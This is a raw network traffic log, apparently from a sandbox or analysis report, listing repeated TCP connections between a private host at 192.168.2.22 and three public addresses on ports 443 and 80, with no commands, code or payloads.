                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49170
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
